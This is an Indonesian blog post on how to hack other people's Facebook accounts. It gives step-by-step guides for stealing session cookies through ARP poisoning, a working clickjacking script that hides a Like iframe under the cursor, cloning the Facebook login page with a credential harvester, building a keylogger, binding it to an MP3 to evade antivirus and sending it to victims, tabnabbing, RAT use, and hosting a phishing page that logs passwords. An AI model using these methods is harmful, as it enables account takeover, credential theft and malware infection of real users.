Yup buat sobat2 semua, jangan mudah tertipu oleh tool- tool hacking facebook baik software / jasa online yang menawarkan langkah pintas dan singkat mendapatkan akun dan password target tujuan.
Karena sebagai jejaring sosial terbesar no 2, Tingkat Keamanan Facebook tidak semudah itu di jebol. Yang ada malah akun/komputer anda menjadi korban virus, keylogger, phishing, dan lain sebagainya..
Facebook tidak dapat di hack menggunakan Facebook Hacking Tools seperti Facebook Freezer, Account Hack, Password Hack, dan lain-lain tetapi dengan knowledge dan skill sobat2 sendiri. “There’s no best hacking tools, but there’s only best hackers..”
Semoga setelah ini tidak ada tidak ada lagi yang menanyakan tools hacking buat Facebook, setidaknya untuk saat ini ^_^.
Dibawah ini ada beberapa metode yang mungkin dapat digunakan :
– Cookie Stealing Attack:
– Clickjacking :
– Social Engineering Attack :
– Session Hijacking Attack :
– Keylogging :
– Tabnabbing :
– Remote Administration Tools (RAT) :
– Phishing attack :
– Facebook Security :
– Using 3 Fake Friends Method :
Berikut Tips singkat mengenai metode-metode diatas :
– Cookie Stealing Attack:
Hack Facebook Dengan Cookies Stealing
Alat:
Ettercap atau Cain and Abel
Wireshark
Firefox dan Add On Cookies Manager
Tips :
1. Pertama sekali kita perlu melakukan Address Resolution Protocol (ARP) poisoning (juga dikenal sebagai ARP flooding, ARP spoofing atau ARP Poison Routing (APR) ).
2. Setelah melakukan ARP poisoning, buka Wire shark, klik ‘capture’ pada menu bar, kemudian pilih ‘interface’. Pilih interface anda (biasanya eth0) dan klik ‘start capture’.
3. Anda akan dapat lihat paket data akan ‘ditangkap’ oleh Wire shark. tunggu sebentar sehingga sasaran log masuk ke akunnya.
4. Sementara itu cari alamat IP Facebook.. pergi ke start —> Run… —> cmd —> kemudian ketikkan Ping Facebook.com
5. Masukkan alamat IP Facebook ke dalam filter bar dan klik ‘apply’.
6. Kemudian, cari HTTP Get /home.php dan copy semua nilai cookies
7. Setelah itu buka Browser Firefox anda dan masukkan cookies tadi ke dalam ‘Cookies Manager’ dan klik ‘save’. (kalau anda menggunakan Firefox terbaru, enable-kan menu bar untuk melihat menu ‘Tools’ kemudian pilih ‘Cookies Manager’)
8. Habis inject buka laman facebook pada satu tab yang lain, done.. anda pun sudah masuk ke dalam akun sasaran!
9. Anda boleh gunakan cara yang sama untuk menghack akun Twitter, Gmail, dan lain-lain.
– Clickjacking :
Sebuah teknik hack yang bisa digunakan untuk phishing (mencuri data pribadi) dan bisa juga untuk penyebaran worm dan worm ini akan menyebar dengan cepat di jejaring sosial itu.
Lewat clickjacking, hacker memancing pengguna Facebook untuk mengklik situs web yang berisi kode-kode berbahaya. Kode-kode itu nantinya akan mengambil alih akun, bahkan mengendalikan akun tersebut, seperti menambah teman, menghapus akun, instal aplikasi. Dan serangan clickjacking ini bukanlah yang pertama kalinya terjadi pada Facebook.
Kini pihak Facebook pun telah mengetahui dan mengembangkan cara untuk memblok/banned aksi clickjacking ini.
Banyak Cara untuk membuat Clickjacking di Facebook, buat contoh bikin Clickjacking Facebook Fanpage aja ya..
Contoh Script Clickjacking Facebook Fanpage :
<script type="text/javascript">
(function(){
var Xcord = 0,
Ycord = 0,
IE = document.all ? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);
var lbox = document.createElement('iframe');
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/kuntillepascom') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80';
lbox.scrolling = 'no';
lbox.frameBorder = 0;
lbox.allowTransparency = 'true';
lbox.style.border = 0;
lbox.style.overflow = 'hidden';
lbox.style.cursor = 'pointer';
lbox.style.width = '53px';
lbox.style.height = '23px';
lbox.style.position = 'absolute';
lbox.style.opacity = 0;
document.getElementsByTagName('body')[0].appendChild(lbox);
window.addEventListener('mousemove', mouseMove, false);
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(lbox);
window.removeEventListener('mousemove', mouseMove, false);
}, 16000);
function mouseMove(e) {
if (IE) {
Xcord = event.clientX + document.body.scrollLeft;
Ycord = event.clientY + document.body.scrollTop;
} else {
Xcord = e.pageX;
Ycord = e.pageY;
}
if (Xcord < 0) Xcord = 0;
if (Ycord < 0) Ycord = 0;
lbox.style.top = (Ycord - 8) + 'px';
lbox.style.left = (Xcord - 25) + 'px';
return true
}
})();
</script>
– Social Engineering Attack :
Metode ini adalah cara Hacking Facebook menggunakan Social Engineering Attack salah satunya dengan Social-Engineer Toolkit (SET) pada backtrack.
Tips:
1. Masuk ke menu backtrack.pilih Backtrack >> exploitation tools >> Social-Engineer Tools >> Social-Engineer Toolkit >>set
2. Masukkan angka 2 dan enter untuk pilihan Website Attack Vectors
3. Masukkan angka 3 dan enter untuk pilihan Credential Harvester Attack Method
4. Masukkan angka 2 dan enter untuk pilihan Site Cloner
5. Selanjutnya akan muncul tampilan yang memerintahkan “Enter the url to clone”..
6. Masukkan [www.facebook.com] tanpa kurung ya
7. proses cloning berjalan untuk sementara dan tekan enter ketika muncul Press {return} to continue
8. Wokee,sampai disini buka browser kamu dan masukkan IP Address Anda pada URL, Maka tampilan login facebook muncul
9. Nah, di tahap ini gunakan akal anda.. atau hanya menunggu korban datang’
– Session Hijacking Attack :
Session hijacking merupakan aksi pengambilan kendali session milik user lain setelah sebelumnya pembajak berhasil memperoleh autentifikasi ID session yang biasanya tersimpan dalam cookies. Session hijacking menggunakan metode Capture, Brute Forced atau Reserve Enggineered guna memperoleh ID Session.
Session hijacking, sesuai dengan namanya, dilakuin dengan cara ngebajak session dari dari suatu user ke suatu website, misalnya Facebook (ini yang paling populer soalnya). Tapi apa itu session?
Kalo kita buka browser kita & ngetik alamat URL Facebook, kita bakal nemuin form login untuk input username & password. Setelah username & password kita isi, lalu kita submit form itu. Lalu kita masuk ke Facebook sebagai account yang kita input username & passwordnya. Pernah nggak kita kepikiran gimana caranya website kayak Facebook ngenalin komputer tempat kita login? Kenapa waktu kita login itu yang bisa kita utak atik cuma account kita, nggak pernah ketuker sama account orang-orang lain yang login ke Facebook di waktu yang sama dengan kita? Itu semua karena ada session.
Session ini punya kode pengenal yang namanya session ID. Waktu kita konek ke Facebook, otomatis di server digenerate session ID yang berfungsi untuk pengenal antara komputer kita & server. Lalu data session ID itu dikirim ke komputer kita masing-masing. Waktu kita login, username & password kita bakal dicocokin dengan data user yang terdaftar di database Facebook. Kalau cocok, session yang kita pake nanti bakal dikasih akses ke data-data account yang kita pake login tadi.
Karena session ID diperluin sebagai pengenal session, setiap kali kita mau buka halaman baru atau ngupdate status di Facebook, session ID bakal dikirim ke sana bersamaan dengan URL halaman baru yang mau kita buka atau teks yang mau kita tulis di status update kita. Karena session ID ikut dikirim, server Facebook bisa ngenalin user mana yang ngerequest buat ngebuka halaman baru & user mana yang mau ngupdate status, & nggak bakalan ketuker dengan user lain.
Session hijacking dilakuin dengan cara ngedapetin session ID & data-data lain yang diperluin server untuk ngenalin user yang lagi login waktu itu. Session hijacking bisa dilakuin pake beberapa teknik, contohnya network sniffing & cookie stealing.
Network sniffing dilakuin dengan cara masang sniffer di jaringan yang dilewatin data session yang dikirim user ke server atau sebaliknya. Tapi serangan ini bisa dicegah kalo kita pake protocol HTTPS, karena data session yang dikirim lewat protocol HTTPS dienkripsi. Kalo datanya dienkripsi, penyerang nggak bakalan bisa make data itu selama dia nggak bisa ngedekripsinya.
Cookie stealing dilakuin dengan cara nyolong data session yang disimpen di dalam cookie browser punya user yang bersangkutan. Cara ngelakuinnya yang paling barbar sih tinggal colok flash disk ke komputer korban, copy cookie yang nyimpen data sessionnya, lalu paste di komputer kita. Cookie stealing yang lebih keren bisa dilakuin pake teknik XSS, tapi agak susah untuk dilakuin kalo security website targetnya bagus.
– Keylogging :
Anda bisa membuat Keylogging/Fake Login/Phishing sendiri atau download free Softwarenya banyak di google.
Salah satu contoh penggunaan software keylogging :
1. Download Project Neptune Keylogger (Project Neptune v1.78)
2. Jalankan Software yang sudah didownload
3. Setting pengaturan sesuai gambar diatas dan masukkan juga username dan password Gmail kamu lalu klik Test Email Account Information
4. Klik System wide > Setting.
5. Selanjutnya klik Tab Installation
6. Setelah semua selesai klik Tab “Server Creation” lalu klik “Generate New Server” dan beri nama sesuai keinginanmu.
Untuk hack password facebook anda harus mengirim file ke korban dan membuatnya menginstalnya pada komputer. Anda dapat menggunakan Binder, crypter atau Fake Hacking Software untuk mengikat server file ini dengan Mp3 sehingga tidak terdeteksi sebagai virus dan bisa dijalankan user. Masukan file keylogger yg sudah dibuat tdi ke dalam file berformat rar atau zip agar bisa diupload ke email, pesan Facebook ataupun di Grup. Lalu kirim file tersebut ke tujuan. Apabila file keylogger dijalankan oleh korban maka alat tersebut mencari untuk semua password dan mengirimkan email yang berisi semua user-id dan password.
– Tabnabbing :
Satu-Satunya perbedaan antara Phishing & Tabnabbing adalah Phishing mengarahkan korban ke halaman tertentu sementara Tabnabbing menggunakan fitur Meta Refresh Browser Web untuk me-refresh halaman setelah penundaan / delay yang diatur oleh pengguna.
Syarat :
1. Halaman Phishing (googling buat download atau salah satu contoh Loops Hacking)
2. Daftar di website my3gb atau sebagainya dan Upload untuk mereka
3. Kirim Link kepada korban
Biasanya teknik ini hampir tidak memerlukan waktu lebih dari 5 menit untuk mendapatkan password account facebook korban.
– Remote Administration Tools (RAT) :
RAT adalah kependekan dari kata Remote Administration Tool.
Contoh Tools : Cerberus RAT, Nuclear Rat 2.1.0, Prorat RAT, CyberGate RAT, Seed 1.1 Rat, Lost Door V4.2 LIGHT, Apocalypse RAT, Turkojan Gold RAT, Spy-Net RAT, dan lain-lain.
RAT’S digunakan untuk menghubungkan dan memanage satu komputer atau lebih dengan berbagai alat, seperti:
* Screen / kamera menangkap atau kontrol
* Manajemen File (download / upload / mengeksekusi / etc.)
* Shell kontrol (biasanya pipa dari command prompt)
* Komputer kontrol (power off / on / log off)
* Registry manajemen (query / menambah / menghapus / memodifikasi)
* Fungsi Khusus product lain
Sambungan Langsung
Sebuah RAT langsung menghubungkan setup sederhana dimana klien akan menghubungkan ke server tunggal atau beberapa secara langsung. server Stabil adalah multi-threaded, memungkinkan beberapa klien untuk dihubungkan, bersama dengan keandalan meningkat.
Reverse Koneksi
RAT yang memanfaatkan sambungan terbalik memiliki keuntungan utama beberapa, seperti yang ditulis dibawah:
* Outgoing koneksi umumnya kurang memperlakukan, dan kurang cenderung dideteksi atau diblokir oleh firewall, seperti router.
* pengetahua remote komputer untuk menghubungkan ke administrator remote, atau tidak akan perlu mengetahui alamat ip untuk remote admin.
* Administrator remote tidak perlu tahu yang atau berapa banyak komputer RAT sedang diinstal pada, yang memungkinkan untuk massa-distribusi.
* Jika mass-distributed, mudah untuk melacak komputer yang telah di pasang RAT
– Phishing attack :
Contoh :
1. Anda dapat membuat sendiri atau download script phising DISINI atau yang lainnya.
2. Jika anda download, extract terlebih dahulu ketiga file tersebut.
3. Setelah di ekstrak, upload ketiga file itu ke hostingan anda. Contoh idhostinger.com atau hosting lain.
4. Buat akun baru di [http://cpanel.idhostinger.com/switcher]
5. Pilih yang gratis (sebelah kiri) dan klik “order”
6. Selanjutnya, anda pilih domain dan isi kolom tersebut. Kolom domain isikan dengan domain (link) yang nantinya akan dijadikan target phising. Contoh : [www.facebook.com]
7. Klik “buat” dan tunggu proses
8. Setelah itu, klik “beralih” pada sebelah kanan
9. Pada cpanel domain anda, gulung kebawah scroll barnya. Masuk ke file manager 3
10. Selanjutnya anda masuk ke public html. Nah silahkan anda upload ketiga file phising tadi disitu dengan cara klik “upload”
11. Klik “pilih file” untuk memilih script phisingnya dan klik tanda centang hijau untuk upload
12. Selanjutnya klik tanda panah biru
13. Jangan lupa ubah chmod/permissionnya menjadi 777 dengan cara centang “logs.txt” lalu klik “chmod”
14. Setelah itu klik tanda panah biru untuk kembali ke public html
15. Nah Sekarang buka domain dan jadilah phising facebook anda. Email dan password korban akan tersimpan di logs.txt
– Facebook Security :
Memanfaatkan celah keamanan Http dengan software lewat games dan lain2 contoh zynga poker.
Tips :
1. log in ke facebook anda
2. ke profile facebook teman anda yang ingin di hack
3. copy adress profile
4. paste di notepad yang ada dikomputer anda
5. instal / Jalankan software ( tinggal next, next, next dan instal )
6. http yang kita paste di notepad tadi kita copy lagi tapi hanya angka belakangnya contohnya :100000896856387, itu contoh sebuah angka http facebook yang tidak di sembunyikan oleh korban.
7. tunggu sampai software mendetect httpnya
8. Done…
– Using 3 Fake Friends Method :
Metode ada pada posting terdahulu saya kliK DISINI.
Salah satunya, dengan menggunakan 3 akun pertemanan palsu untuk menjebak Target. Tapi mungkin saat ini pihak Facebook telah mengetahui celah ini.
Oke sobat sekian tips kilat dari saya, intinya adalah jangan mudah tertipu jalan pintas / singkat karna memang disitulah seninya.. menembus tingkat kesulitan yang ada.
Sampai jumpa lagi sob’
Wasallam…
Noface 